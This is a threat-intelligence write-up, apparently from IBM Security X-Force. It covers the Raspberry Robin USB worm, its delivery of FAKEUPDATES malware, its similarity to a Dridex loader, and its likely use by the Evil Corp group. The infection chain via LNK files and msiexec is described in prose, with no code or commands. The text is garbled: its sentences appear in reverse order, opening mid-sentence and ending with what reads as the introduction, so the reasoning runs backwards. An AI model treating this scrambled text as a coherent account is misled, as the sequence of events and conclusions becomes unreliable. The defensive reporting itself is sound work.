LNK file, it spawns a malicious command referencing msiexec.exe, a legitimate Windows system utility, to download and execute an MSI installer from a command and control (C2) domain. Raspberry Robin, also known as the QNAP worm, is typically delivered by a USB device, which contains a malicious Microsoft shortcut (.LNK) file. Using RaaS allows Evil Corp to blend in with other affiliates that would hinder attribution and ultimately skirt around sanctions. The US Treasury sanctioned Evil Corp in 2019 but the group had already begun deploying custom ransomware-as-a-service (RaaS) payloads, rebranding them as WastedLocker, before shifting to the well-known RaaS LockBit ransomware. Evil Corp had been leveraging FAKEUPDATES since at least April 2018 as the initial infection vector for the info-stealing Dridex malware that later resulted in deployment of DOPPLEPAYMER ransomware. The relationship between the threat actor behind FAKEUPDATES and Evil Corp is not new. The disclosure by the Microsoft threat researchers revealed that the “… DEV-0206-associated FAKEUPDATES activity on affected systems has since led to follow-on actions resembling DEV-0243 pre-ransomware behavior.” This statement indicates a possible relationship between Raspberry Robin and DEV-0243, which the cyber intelligence community tracks as “Evil Corp”. Microsoft researchers observed millions of Raspberry Robin infections, but no evidence of post-infection exploits had been seen in the wild until July 26, 2022, when Microsoft disclosed that they had uncovered existing Raspberry Robin infections delivering FAKEUPDATES malware (aka SocGholish). The ultimate objective of Raspberry Robin had been unknown. This number is significant as historically less than 1% of MDR clients have seen the same strain of malware. The infections spiked in early June and by early August spikes of Raspberry Robin infection attempts were observed in 17% of worldwide MDR clients in the oil and gas, manufacturing, and transportation industries. When Raspberry Robin infection attempts were first observed impacting a few IBM Security MDR customers in mid-May 2022, the enigmatic worm activity began to quickly spread within a client’s network from users sharing USB devices. Thus, IBM Security research draws another link between the Raspberry Robin infections and the Russia-based cybercriminal group ‘Evil Corp,’ which is the same group behind the Dridex Malware, suggesting that Evil Corp is likely using Raspberry Robin infrastructure to carry out its attacks. Based on a comparative analysis between a downloaded Raspberry Robin DLL and a Dridex malware loader, the results show that they are similar in structure and functionality. IBM Security Managed Detection and Response (MDR) observations coupled with IBM Security X-Force malware research sheds additional light on the mysterious objectives of the operators behind the Raspberry Robin worm.
0 Comments
Leave a Reply. |